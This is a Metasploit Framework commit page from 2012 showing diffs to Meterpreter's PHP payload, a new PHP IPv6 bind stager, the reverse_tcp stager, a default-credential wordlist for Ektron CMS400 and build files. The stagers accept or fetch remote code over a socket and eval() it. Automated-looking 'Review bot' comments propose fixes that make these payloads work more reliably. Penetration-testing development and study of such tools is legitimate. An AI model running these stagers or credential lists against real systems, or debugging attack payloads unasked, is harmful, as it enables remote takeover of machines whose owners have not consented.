
Merge branch 'release/20120131000001' into stable

Jenkins
Jenkins committed Feb 13, 2012
2 parents 060115e + 77a9b36 commit d70596ab44a81652ac4ad92d052f0fbdf6f4ff1d
Showing with 2,603 additions and 585 deletions.
  1. BIN data/gui/msfgui.jar
  2. BIN data/meterpreter/ext_server_networkpug.lso
  3. BIN data/meterpreter/ext_server_sniffer.lso
  4. BIN data/meterpreter/ext_server_stdapi.lso
  5. +17 −9 data/meterpreter/meterpreter.php
  6. BIN data/meterpreter/msflinker_linux_x86.bin
  7. +53 −0 data/php/bind_tcp_ipv6.php
  8. +4 −1 data/php/reverse_tcp.php
  9. +32 −10 data/post/enum_artifacts_list.txt
  10. +9 −0 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb
  11. +14 −0 data/wordlists/cms400net_default_userpass.txt
  12. +12 −0 external/source/gui/msfguijava/src/msfgui/PayloadPopup.java
  13. +3 −3 external/source/gui/msfguijava/src/msfgui/RpcConnection.java
  14. +29 −6 external/source/meterpreter/Makefile
  15. +5 −1 external/source/meterpreter/source/bionic/libc/Android.mk
  16. +1 −1 external/source/meterpreter/source/bionic/libc/Jamfile
  17. +2 −2 external/source/meterpreter/source/bionic/libc/out/x86/make.sh
  18. +1 −1 external/source/meterpreter/source/bionic/libdl/Makefile
  19. +1 −0 external/source/meterpreter/source/bionic/libm/msfMakefile
  20. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/dir.c
  21. +2 −2 external/source/meterpreter/source/extensions/stdapi/server/fs/file.c
  22. +29 −0 external/source/meterpreter/source/extensions/stdapi/server/fs/fs.h
  23. +29 −1 external/source/meterpreter/source/extensions/stdapi/server/fs/fs_util.c
  24. +28 −9 external/source/meterpreter/source/openssl/build.sh
  25. +6 −5 external/source/meterpreter/source/server/rtld/Makefile
  26. +2 −2 external/source/meterpreter/source/server/rtld/elf2bin.c
  27. +4 −4 external/source/meterpreter/source/server/rtld/linker_debug.h
  28. +1 −1 external/source/meterpreter/workspace/Makefile
  29. +1 −1 external/source/meterpreter/workspace/common/Makefile
  30. +1 −1 external/source/meterpreter/workspace/ext_posix_sample/Makefile
  31. +1 −1 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
  32. +1 −1 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
  33. +1 −1 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
  34. +1 −1 external/source/meterpreter/workspace/metsrv/Makefile
  35. +1 −1 lib/msf/core/auxiliary/report.rb
  36. +1 −0 lib/msf/core/db.rb
  37. +2 −1 lib/msf/core/exploit/http/client.rb
  38. +10 −2 lib/msf/core/exploit/http/server.rb
  39. +12 −1 lib/msf/core/exploit/postgres.rb
  40. +4 −0 lib/msf/core/model/host.rb
  41. +12 −0 lib/msf/core/post/common.rb
  42. +16 −4 lib/msf/core/post/file.rb
  43. +5 −0 lib/msf/core/rpc/v10/rpc_module.rb
  44. +21 −10 lib/msf/ui/console/command_dispatcher/core.rb
  45. +1 −1 lib/postgres/postgres-pr/connection.rb
  46. +1 −1 modules/auxiliary/admin/natpmp/natpmp_map.rb
  47. +8 −3 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
  48. +59 −54 modules/auxiliary/bnat/bnat_scan.rb
  49. +2 −2 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
  50. +1 −1 modules/auxiliary/gather/natpmp_external_address.rb
  51. +108 −10 modules/auxiliary/scanner/discovery/udp_probe.rb
  52. +114 −8 modules/auxiliary/scanner/discovery/udp_sweep.rb
  53. +161 −0 modules/auxiliary/scanner/http/ektron_cms400net.rb
  54. +1 −1 modules/auxiliary/scanner/http/tomcat_enum.rb
  55. +1 −62 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
  56. +2 −48 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
  57. +1 −1 modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
  58. +1 −37 modules/auxiliary/scanner/oracle/oracle_hashdump.rb
  59. +1 −1 modules/auxiliary/scanner/oracle/xdb_sid.rb
  60. +1 −1 modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  61. +66 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb
  62. +174 −0 modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb
  63. +1 −1 modules/auxiliary/scanner/postgres/postgres_hashdump.rb
  64. +2 −2 modules/auxiliary/scanner/postgres/postgres_version.rb
  65. +1 −1 modules/auxiliary/scanner/snmp/snmp_login.rb
  66. +7 −1 modules/auxiliary/scanner/vmware/vmauthd_login.rb
  67. +94 −0 modules/auxiliary/scanner/vmware/vmware_http_login.rb
  68. +1 −1 modules/auxiliary/server/tftp.rb
  69. +13 −18 modules/auxiliary/spoof/arp/arp_poisoning.rb
  70. +1 −1 modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  71. +100 −0 modules/exploits/multi/http/vbseo_proc_deutf.rb
  72. +1 −1 modules/exploits/osx/browser/mozilla_mchannel.rb
  73. +1 −1 modules/exploits/windows/browser/mozilla_mchannel.rb
  74. +469 −0 modules/exploits/windows/browser/ms12_004_midi.rb
  75. +1 −1 modules/exploits/windows/browser/teechart_pro.rb
  76. +3 −3 modules/exploits/windows/browser/vlc_amv.rb
  77. +74 −0 modules/exploits/windows/misc/hp_magentservice.rb
  78. +53 −0 modules/payloads/singles/osx/x64/exec.rb
  79. +61 −0 modules/payloads/singles/php/bind_perl_ipv6.rb
  80. +92 −0 modules/payloads/singles/php/bind_php_ipv6.rb
  81. +0 −1 modules/payloads/singles/php/meterpreter_reverse_tcp.rb
  82. +4 −3 modules/payloads/singles/php/reverse_perl.rb
  83. +13 −5 modules/payloads/singles/php/reverse_php.rb
  84. +54 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  85. +2 −3 modules/post/linux/gather/checkvm.rb
  86. +64 −0 modules/post/multi/gather/enum_vbox.rb
  87. +138 −0 modules/post/multi/gather/find_vmx.rb
  88. +11 −2 modules/post/multi/gather/pidgin_cred.rb
  89. +36 −18 modules/post/windows/gather/checkvm.rb
  90. +1 −1 modules/post/windows/gather/credentials/filezilla_server.rb
  91. +2 −2 modules/post/windows/gather/credentials/imail.rb
  92. +1 −1 modules/post/windows/gather/credentials/imvu.rb
  93. +1 −1 modules/post/windows/gather/credentials/nimbuzz.rb
  94. +3 −2 modules/post/windows/gather/dumplinks.rb
  95. +45 −41 modules/post/windows/gather/enum_artifacts.rb
  96. +2 −2 modules/post/windows/gather/enum_devices.rb
  97. +3 −0 msfvenom
  98. +12 −12 tools/msftidy.rb
  99. +157 −144 tools/reg.rb
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -730,6 +730,17 @@ function register_stream($stream, $ipaddr=null, $port=null) {
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
+
+ # IPv6 requires brackets around the address in some cases, but not all.
+ # Keep track of the un-bracketed address for the functions that don't like
+ # brackets, specifically socket_connect and socket_sendto.
+ $ipf = AF_INET;
+ $raw_ip = $ipaddr;
+ if (FALSE !== strpos($ipaddr, ":")) {
+ $ipf = AF_INET6;
+ $ipaddr = "[". $raw_ip ."]";
+ }
+
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
@@ -759,16 +770,17 @@ function connect($ipaddr, $port, $proto='tcp') {
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
- } elseif (is_callable('socket_create')) {
+ } else
+ if (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
- $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
+ $res = socket_connect($sock, $raw_ip, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
- $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
- register_socket($sock, $ipaddr, $port);
+ $sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
+ register_socket($sock, $raw_ip, $port);
}
}
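Review bot: The branch header is now split as `} else` followed by `if (is_callable('socket_create')) {` on its own line, which reads like a dangling `else` and differs from the `} elseif ($proto == 'udp') {` form used inside the same block; `} elseif (is_callable('socket_create')) {` keeps the chain uniform. The two paths also record different address forms for the same peer: `register_stream($sock, $ipaddr, $port)` receives the bracketed string while `register_socket($sock, $raw_ip, $port)` receives the bare one, so a one-line comment stating which form each registry expects would help the next reader. connect() starts in the previous hunk and its end is outside this one.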
@@ -1066,10 +1078,6 @@ function remove_reader($resource) {
$ipaddr = '127.0.0.1';
$port = 4444;
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
- if (FALSE !== strpos($ipaddr,":")) {
- # ipv6 requires brackets around the address
- $ipaddr = "[".$ipaddr."]";
- }
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
Binary file not shown.
@@ -0,0 +1,53 @@
+#<?php
+
+# The payload handler overwrites this with the correct LPORT before sending
+# it to the victim.
+$port = 4444;
+$ipaddr = "::";
+
+if (is_callable('stream_socket_server')) {
+ $srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
+ if (!$srvsock) { die(); }
+ $s = stream_socket_accept($srvsock, -1);
+ $s_type = 'stream';
+} elseif (is_callable('socket_create_listen')) {
+ $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} elseif (is_callable('socket_create')) {
+ $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
+ $res = socket_bind($srvsock, $ipaddr, $port);
+ if (!$res) { die(); }
+ $s = socket_accept($srvsock);
+ $s_type = 'socket';
+} else {
+ die();
+}
+if (!$s) { die(); }
+
+switch ($s_type) {
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+ # We failed on the main socket. There's no way to continue, so
+ # bail
+ die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+ switch ($s_type) {
+ case 'stream': $b .= fread($s, $len-strlen($b)); break;
+ case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+ }
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();
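Review bot: In the `socket_create_listen` branch the guard `if (!$res) { die(); }` tests a variable that is never assigned on that path, so it evaluates as unset and the branch exits regardless of what the call above returned; the guard should test the value actually produced, `if (!$srvsock) { die(); }`. Both `switch ($s_type)` blocks also lack a `default`, which is harmless while `$s_type` is only ever `'stream'` or `'socket'`, but a `default: die();` would make that assumption explicit.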
@@ -5,9 +5,12 @@
# it to the victim.
$ip = '127.0.0.1';
$port = 4444;
+$ipf = AF_INET;
+
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
+ $ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
@@ -17,7 +20,7 @@
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
- $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
+ $s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
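Review bot: `@socket_connect($s, $ip, $port)` in the `socket_create` fallback is still handed the `$ip` that was wrapped in brackets at the top of the file, even though the family is now chosen correctly through `$ipf`. The meterpreter.php change in this same commit keeps an un-bracketed `$raw_ip` for exactly this call because, per its own comment, `socket_connect` does not like brackets. Keeping the original string here too (`$raw_ip = $ip;` before the bracket step, then `socket_connect($s, $raw_ip, $port)`) would make the two files agree. The `@` also suppresses the warning that would reveal the mismatch.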
@@ -1,14 +1,36 @@
-# This file contains a list of artifacts used by the enum_artifacts post module
-# Artifacts should be listed one per line and use the following formats:
-# File entries
-# file|path/to/file|md5sum
+# YAML:1.0
+# Configuration file for enum_artifacts.rb module
+# This file contains a YAML formated list of artifacts used by the
+# enum_artifacts post module. Artifacts should be listed using the following
+# format:
#
-# Registry entries
-# reg|hive|key|value
+# ---
+# malware_name:
+# files:
+# - name: path\to\file
+# csum: 00112233445566778899aabbccddeeff
+# - name: path\to\another\file
+# csum: 112233445566778899aabbccddeeff00
+#
+# reg_entries:
+# - key: registry_key
+# val: registry_value
+# data: data
#
# Happy hunting
+---
+test_evidence:
+ files:
+ - name: c:\ntdetect.comx
+ csum: b2de3452de03674c6cec68b8c8ce7c78
+ - name: c:\boot.ini
+ csum: fa579938b0733b87066546afe951082c
+
+ reg_entries:
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\Selectx
+ val: Current
+ data: 1
+ - key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI
+ val: DisplayName
+ data: Microsoft ACPI Driver
-file|c:\ntdetect.com|b2de3452de03674c6cec68b8c8ce7c78
-file|c:\boot.ini|fa579938b0733b87066546afe951082c
-reg|HKEY_LOCAL_MACHINE\SYSTEM\Select|Current|1
-reg|HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI|DisplayName|Microsoft ACPI Driver
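Review bot: Two sample entries differ from the pipe-delimited lines they replace only by a trailing `x` — `c:\ntdetect.comx` (was `c:\ntdetect.com`) and `HKEY_LOCAL_MACHINE\SYSTEM\Selectx` (was `...\Select`) — which looks like leftover negative-test data rather than an intended artifact; if it is deliberate, a comment such as `# intentionally absent, exercises the not-found path` should say so. The header comment has a typo (`formated`). The old header named the checksum as `md5sum`; the new format description only says `csum`, so it should state that the value is an MD5 hex digest.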
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end
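Review bot: `self.down` removes `:viritual_host`, but `self.up` adds `:virtual_host`, so a rollback does not drop the column this migration created and will probably fail on the unknown column name. The line should read `remove_column :hosts, :virtual_host`.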
@@ -0,0 +1,14 @@
+admin admin
+builtin builtin
+jedit jedit
+jmember jmember
+Admin2 Admin2
+tbrown tbrown
+jsmith jsmith
+vs vs
+EkExplorerUser EkExplorerUser
+Explorer Explorer
+member@example.com member@example.com
+north north
+supermember supermember
+west west
@@ -46,6 +46,18 @@ public PayloadPopup(String fullName, RpcConnection rpcConn, MainFrame frame) {
encoderCombo.setSelectedIndex(defaultEncoder);
}catch(MsfException xre){
}
+ //get formats
+ try{
+ Object[] formats = ((List)rpcConn.execute("module.encode_formats")).toArray();
+ int defaultFormat = 0;
+ for(int i = 0; i < formats.length; i++)
+ if(formats[i].toString().equals("exe"))
+ defaultFormat = i;
+ outputCombo.setModel(new DefaultComboBoxModel(formats));
+ outputCombo.setSelectedIndex(defaultFormat);
+ }catch(MsfException xre){
+ xre.printStackTrace();
+ }
mainScrollPane.getVerticalScrollBar().setUnitIncrement(40);
}
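Review bot: The result of `rpcConn.execute("module.encode_formats")` is cast to a raw `List` with no type check, and the only handler is `catch(MsfException xre)`, so a reply that is not a list would surface as an unchecked `ClassCastException` out of the constructor. Whether the server can return such a reply is not visible here, but an `instanceof List` test before the cast, leaving the combo box's existing model in place otherwise, would contain it. The `for`/`if` pair is unbraced, and `xre.printStackTrace()` is inconsistent with the silent `catch` directly above it; one of the two conventions should be chosen. The constructor starts outside this hunk.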
@@ -84,7 +84,7 @@ public void setup(String username, char[] password, String host, int port, boole
String message = "";
try {
connect();
- Map results = exec("auth.login",new Object[]{username, this.password});
+ Map results = (Map)exec("auth.login",new Object[]{username, this.password});
rpcToken=results.get("token").toString();
haveRpcd=results.get("result").equals("success");
} catch (MsfException xre) {
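Review bot: A non-Map reply to `auth.login` now escapes as an unchecked `ClassCastException`, because the `(Map)` cast sits in `setup` under `catch (MsfException xre)` only. Before this change the cast was inside `exec`, in the `try` whose `catch(Exception ex)` wraps "any weirdness" in an `MsfException`. Checking the type before casting keeps the old failure mode, e.g. `Object r = exec("auth.login", new Object[]{username, this.password});` followed by `if (!(r instanceof Map)) throw new MsfException(/* constructor arguments not shown on this page */);`. Other callers of `exec` that relied on the `Map` return type are outside this diff and need the same treatment. setup() starts before this hunk and continues after it.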
@@ -211,11 +211,11 @@ private Object cacheExecute(String methodName, Object[] params) throws MsfExcept
}
/** Method that handles synchronization and error handling for calls */
- private Map exec (String methname, Object[] params) throws MsfException{
+ private Object exec (String methname, Object[] params) throws MsfException{
synchronized(lockObject){ //Only one method call at a time!
try{
writeCall(methname, params);
- return (Map)readResp();
+ return readResp();
}catch(Exception ex){ //any weirdness gets wrapped in a MsfException
try{
if(ex instanceof java.net.SocketTimeoutException)
@@ -40,11 +40,25 @@ external/source/meterpreter/source/bionic/compiled/libcrypto.so: tmp/openssl-0.9
external/source/meterpreter/source/bionic/compiled/libssl.so: tmp/openssl-0.9.8o/libssl.so
cp tmp/openssl-0.9.8o/libssl.so external/source/meterpreter/source/bionic/compiled/libssl.so
+LIBC=$(PWD)/external/source/meterpreter/source/bionic/libc
+LIBM=$(PWD)/external/source/meterpreter/source/bionic/libm
+COMPILED=$(PWD)/external/source/meterpreter/source/bionic/compiled
+MSF_CFLAGS=-Os -Wl,--hash-style=sysv -march=i386 -m32 -nostdinc -nostdlib -fno-builtin -fpic -I $(LIBC)/include -I $(LIBC)/kernel/common/linux/ -I $(LIBC)/kernel/common/ -I $(LIBC)/arch-x86/include/ -I $(LIBC)/kernel/arch-x86/ -I$(LIBC)/private -I$(LIBM)/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L$(COMPILED) -lc
+
tmp/openssl-0.9.8o/libssl.so:
[ -d tmp ] || mkdir tmp
- [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz && tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
- (cd tmp/openssl-0.9.8o && ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-elf shared)
- (cd tmp/openssl-0.9.8o && make CC="gcc -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
+ [ -d tmp/openssl-0.9.8o ] || wget -O tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
+ [ -f tmp/openssl-0.9.8o/Configure ] || tar -C tmp/ -xzf tmp/openssl-0.9.8o.tar.gz
+ (cd tmp/openssl-0.9.8o && \
+ cat Configure | grep -v 'linux-msf' | \
+ sed -e 's#my %table=(#my %table=( \
+ "linux-msf", "gcc:$(MSF_CFLAGS) -DL_ENDIAN -DTERMIO -Wall::$(MSF_CFLAGS) -D_REENTRANT::$(MSF_CFLAGS) -ldl:BN_LLONG $${x86_gcc_des} $${x86_gcc_opts}:$${x86_elf_asm}:dlfcn:linux-shared:$(MSF_CFLAGS) -fPIC::.so.\\$$\\$$(SHLIB_MAJOR).\\$$\\$$(SHLIB_MINOR)",\
+ #;' > Configure-msf;\
+ cp Configure-msf Configure && chmod +x Configure && \
+ grep linux-msf Configure && \
+ ./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf \
+ )
+ (cd tmp/openssl-0.9.8o && make CC="gcc -march=i386 -m32 -Os -Wl,--hash-style=sysv -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -I${PWD}/external/source/meterpreter/source/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${PWD}/external/source/meterpreter/source/bionic/libm/include -L${PWD}/external/source/meterpreter/source/bionic/compiled -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend all ; [ -f libssl.so.0.9.8 -a -f libcrypto.so.0.9.8 ] )
cp tmp/openssl-0.9.8o/libssl.so* tmp/openssl-0.9.8o/libcrypto.so* external/source/meterpreter/source/openssl/lib/linux/i386/
external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1/libpcap.so.1.1.1
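Review bot: The OpenSSL tarball is fetched with `wget` over plain `http://` and then unpacked, patched and built with no integrity check, so whatever the network returns ends up in the shipped libraries; the libpcap download in the `tmp/libpcap-1.1.1/libpcap.so.1.1.1` rule has the same gap. Pinning a digest and verifying it before `tar` closes this, e.g. `echo "<EXPECTED_SHA256>  tmp/openssl-0.9.8o.tar.gz" | sha256sum -c -` (placeholder digest, to be taken from the signed release). Separately, the download guard tests `[ -d tmp/openssl-0.9.8o ]` whereas the libpcap rule tests for the tarball itself; if the directory exists without `Configure` and the tarball is absent, the new `tar` line fails, so `[ -f tmp/openssl-0.9.8o.tar.gz ] || wget ...` would be the consistent guard.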
@@ -53,7 +67,7 @@ external/source/meterpreter/source/bionic/compiled/libpcap.so: tmp/libpcap-1.1.1
tmp/libpcap-1.1.1/libpcap.so.1.1.1:
[ -d tmp ] || mkdir tmp
[ -f tmp/libpcap-1.1.1.tar.gz ] || wget -O tmp/libpcap-1.1.1.tar.gz http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
- tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
+ [ -f tmp/libpcap-1.1.1/configure ] || tar -C tmp -xzf tmp/libpcap-1.1.1.tar.gz
(cd tmp/libpcap-1.1.1 && ./configure --disable-bluetooth --without-bluetooth --without-usb --disable-usb --without-can --disable-can --without-usb-linux --disable-usb-linux)
echo '#undef HAVE_DECL_ETHER_HOSTTON' >> tmp/libpcap-1.1.1/config.h
echo '#undef HAVE_SYS_BITYPES_H' >> tmp/libpcap-1.1.1/config.h
@@ -63,7 +77,7 @@ tmp/libpcap-1.1.1/libpcap.so.1.1.1:
echo '#define _STDLIB_H this_works_around_malloc_definition_in_grammar_dot_c' >> tmp/libpcap-1.1.1/config.h
(cd tmp/libpcap-1.1.1 && patch --dry-run -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff && patch -p0 < ../../external/source/meterpreter/source/libpcap/pcap_nametoaddr_fix.diff)
sed -i -e s/pcap-usb-linux.c//g -e s/fad-getad.c/fad-gifc.c/g tmp/libpcap-1.1.1/Makefile
- sed -i -e s^"CC = gcc"^"CC = gcc -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
+ sed -i -e s^"CC = gcc"^"CC = gcc -march=i386 -m32 -Wl,--hash-style=sysv -fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall -D_UNIX -D__linux__ -I${PWD}/external/source/meterpreter/source/bionic/libc/include -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/linux/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/common/ -I${PWD}/external/source/meterpreter/source/bionic/libc/arch-x86/include/ -I${PWD}/external/source/meterpreter/source/bionic/libc/kernel/arch-x86/ -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -D_BYTE_ORDER=_LITTLE_ENDIAN -lgcc -L${PWD}/external/source/meterpreter/source/bionic/compiled -gstabs+ -fPIC -Os -lc"^g tmp/libpcap-1.1.1/Makefile
(cd tmp/libpcap-1.1.1 && make)
@@ -108,10 +122,19 @@ data/meterpreter/ext_server_networkpug.lso: $(workspace)/ext_server_networkpug/e
clean:
rm -f $(objects)
rm -f external/source/meterpreter/source/bionic/lib*/*.o
+ find external/source/meterpreter/source/bionic/ -name '*.a' -print0 | xargs -0 rm -f 2>/dev/null
rm -f external/source/meterpreter/source/bionic/lib*/*.so
(cd external/source/meterpreter/source/server/rtld/ && make clean)
(cd $(workspace) && make clean)
+clean-pcap:
+ (cd tmp/libpcap-1.1.1/ && make clean)
+
+clean-ssl:
+ (cd tmp/openssl-0.9.8o/ && make clean)
+
+really-clean: clean clean-ssl clean-pcap
+
-.PHONY: clean
+.PHONY: clean clean-ssl clean-pcap really-clean
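Review bot: `clean-pcap` and `clean-ssl` `cd` into `tmp/libpcap-1.1.1/` and `tmp/openssl-0.9.8o/` unconditionally, so `make really-clean` fails on a tree where those sources were never downloaded. Guarding each recipe, e.g. `[ ! -d tmp/libpcap-1.1.1 ] || $(MAKE) -C tmp/libpcap-1.1.1 clean`, makes it a no-op in that case, and `$(MAKE)` passes the parent's flags to the sub-make.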
@@ -443,7 +443,11 @@ else # !arm
# Enable recent IA friendly memory routines (such as for Atom)
# These will not work on the earlier x86 machines
- libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+ #libc_common_cflags += -mtune=i686 -DUSE_SSSE3 -DUSE_SSE2
+
+ # egypt: compile for 386 so meterpreter will have a chance of working on
+ # older processors
+ libc_common_cflags += -march=i386
endif # x86
endif # !arm
@@ -377,7 +377,7 @@ DEFINES = USE_LOCKS
ANDROID
;
-CFLAGS_x86 = -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
+CFLAGS_x86 = -m32 -march=i386 -Iprivate -Ibionic -Ikernel/arch-x86 -Ikernel/common -I../libm/include -fno-stack-protector -fno-pie -DPIC -ffreestanding -fno-tree-scev-cprop ;
for arch in $(ARCH)
@@ -11,10 +11,10 @@ for i in $BAD_FILES ; do
rm flood/$i >/dev/null
done
-gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc
+gcc -Wl,--hash-style=sysv -nostdinc -nostdlib -shared -o libbionic.so flood/*.o -lgcc -march=i386 -m32
[ ! -f libc.so ] && ln -s ${PWD}/libbionic.so libc.so
rm -rf flood >/dev/null
-
+exit 0
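Review bot: The added `exit 0` pins the script's status to success regardless of whether the `gcc ... -o libbionic.so` link succeeded, and nothing visible in the hunk checks that command's result, so a caller cannot tell that `libbionic.so` is missing or stale. Failing explicitly on the link step, `gcc ... -o libbionic.so flood/*.o -lgcc -march=i386 -m32 || exit 1`, keeps the final `exit 0` meaningful. The script begins before this hunk.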
@@ -3,7 +3,7 @@ CFLAGS+= -I../libc/include -I../libc/private -I../libc/bionic -I../libc/kernel/a
CFLAGS+= -I../libc/kernel/common/linux/ -I../libc/arch-x86/include/ -I../libc/kernel/common/
CFLAGS+= -Os
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
all:
gcc -Wl,--hash-style=sysv -shared -o libdl.so $(CFLAGS) libdl.c
@@ -10,6 +10,7 @@ CFLAGS+=-I../libc/kernel/common/ -I../libc/arch-${TARGET_ARCH}/include/ -I../lib
CFLAGS+=-D_BYTE_ORDER=_LITTLE_ENDIAN -Ihack/ -I${TARGET_FPU} -I../libc/arch-${TARGET_ARCH}/include
CFLAGS+=-fPIC -DPIC
CFLAGS+=-Wl,--hash-style=sysv
+CFLAGS+=-march=i386 -m32
libm_common_src_files= \
isinf.c \
@@ -21,7 +21,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
LPSTR expanded = NULL, tempFile = NULL;
DWORD tempFileSize = 0;
LPSTR baseDirectory = NULL;
- struct stat buf;
+ struct meterp_stat buf;
directory = packet_get_tlv_value_string(packet, TLV_TYPE_DIRECTORY_PATH);
@@ -150,7 +150,7 @@ DWORD request_fs_ls(Remote *remote, Packet *packet)
tempFile);
// Stat the file to get more information about it.
- if (stat(tempFile, &buf) >= 0)
+ if (fs_stat(tempFile, &buf) >= 0)
packet_add_tlv_raw(response, TLV_TYPE_STAT_BUF, &buf,
sizeof(buf));
